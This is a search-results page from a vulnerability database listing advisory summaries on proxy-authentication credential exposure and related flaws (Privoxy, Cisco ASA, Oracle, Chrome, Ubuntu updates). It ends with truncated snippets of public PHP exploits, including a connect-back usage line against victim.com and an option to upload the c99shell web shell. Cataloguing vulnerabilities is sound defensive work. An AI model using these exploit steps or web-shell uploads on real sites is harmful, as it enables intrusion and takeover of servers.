281 matches found
Privoxy 3.0.20-1 Credential Exposure
Privoxy Proxy Authentication Credential Exposure Product: Privoxy Project Homepage: privoxy.org Advisory ID: c22-2013-01 Vulnerable Versions: 3.0.20 and possibly prior Tested Version: 3.0.20-1 tested using Debian Sid Vendor Notification: March 6, 2013 Public Disclosure: March 11, 2013 Vulnerabili...
Privoxy Proxy - Authentication Information Disclosure
Privoxy Proxy - Authentication Information Disclosure source: https://www.securityfocus.com/bid/58425/info Privoxy is prone to multiple information-disclosure vulnerabilities. Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This...
privoxy -- malicious server spoofing as proxy vulnerability
Privoxy Developers reports: Proxy authentication headers are removed unless the new directive enable-proxy-authentication-forwarding is used. Forwarding the headers potentially allows malicious sites to trick the user into providing them with login information. Reported by Chris John Riley...
USN-1748-1: Thunderbird vulnerabilities
Bobby Holley discovered vulnerabilities in Chrome Object Wrappers COW and System Only Wrappers SOW. If a user were tricked into opening a specially crafted page and had scripting enabled, a remote attacker could exploit this to bypass security protections to obtain sensitive information or...
CVE-2012-0335
Cisco Adaptive Security Appliances ASA 5500 series devices with software 7.2 through 8.4 do not properly perform proxy authentication during attempts to cut through a firewall, which allows remote attackers to obtain sensitive information via a connection attempt, aka Bug ID CSCtx42746...
Information disclosure
Cisco Adaptive Security Appliances ASA 5500 series devices with software 7.2 through 8.4 do not properly perform proxy authentication during attempts to cut through a firewall, which allows remote attackers to obtain sensitive information via a connection attempt, aka Bug ID CSCtx42746...
CVE-2012-0335
Cisco Adaptive Security Appliances ASA 5500 series devices with software 7.2 through 8.4 do not properly perform proxy authentication during attempts to cut through a firewall, which allows remote attackers to obtain sensitive information via a connection attempt, aka Bug ID CSCtx42746...
PT-2012-2509 · Cisco · Cisco Asa
Name of the Vulnerable Software and Affected Versions: Cisco Adaptive Security Appliances ASA 5500 series devices versions 7.2 through 8.4 Description: The issue allows remote attackers to obtain sensitive information via a connection attempt due to improper proxy authentication during attempts t...
Ubuntu Update for kde4libs USN-1248-1
Ubuntu Update for Linux kernel vulnerabilities USN-1248-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN12481.nasl 7964 2017-12-01 07:32:11Z santu $ Ubuntu Update for kde4libs USN-1248-1 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net Thi...
USN-1248-1: KDE-Libs vulnerability
Tim Brown discovered that KSSL in KDE-Libs did not properly perform input validation when displaying the common name CN for an SSL certificate. An attacker could exploit this to spoof the common name which could be used in an attack to trick the user into accepting a fraudulent certificate. This...
Google Chrome < 8.0.552.215 Multiple Vulnerabilities
Binary data 800959.prm...
Google Chrome < 8.0.552.215 Multiple Vulnerabilities
The version of Google Chrome installed on the remote host is earlier than 8.0.552.215. Such versions are reportedly affected by multiple vulnerabilities : - It may be possible to bypass the pop-up blocker. Issue 17655 - A cross-origin video theft vulnerability exists related to canvas. Issue 5574...
CVE-2008-2625: Oracle DBMS – Proxy Authentication Vulnerability
Oracle is a widely-deployed Database Management System DBMS that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism...
CVE-2005-4874
The XMLHttpRequest object in Mozilla 1.7.8 supports the HTTP TRACE method, which allows remote attackers to obtain 1 proxy authentication passwords via a request with a "Max-Forwards: 0" header or 2 arbitrary local passwords on the web server that hosts this object...
JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit
Exploit for unknown platform in category web applications ======================================================= JBC Explorer agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php";...
Pluxml 0.3.1 Remote Code Execution Exploit
Exploit for unknown platform in category web applications ========================================== Pluxml 0.3.1 Remote Code Execution Exploit ========================================== sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 /Waiting for connection on...
Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution
No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; Advisory soon if$argc 3 print" TITLE | Net Portal Dynamic System NPDS = 5.10 Remote Code Execution 0day AUTHOR | DarkFig / http://www.acid-root.new.fr / [email protected] NOTE | Works regardless of php settings...
webspell-exec.txt
!/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -file Options Params: -url For example http://victim.com/webspell/ -file The file you wanna upload c99shell.php... Options: -prefix Table prefix default=webs...
webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
Exploit for unknown platform in category web applications ===================================================== webSPELL -file Options Params: -url For example http://victim.com/webspell/ -file The file you wanna upload c99shell.php... Options: -prefix Table prefix default=webs -upmatch The match...
NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ============================================================== NukeSentinel 2.5.05 nsbypass.php Blind SQL Injection Exploit ============================================================== !/usr/bin/php -victim Opts Options: -isadmin Is the...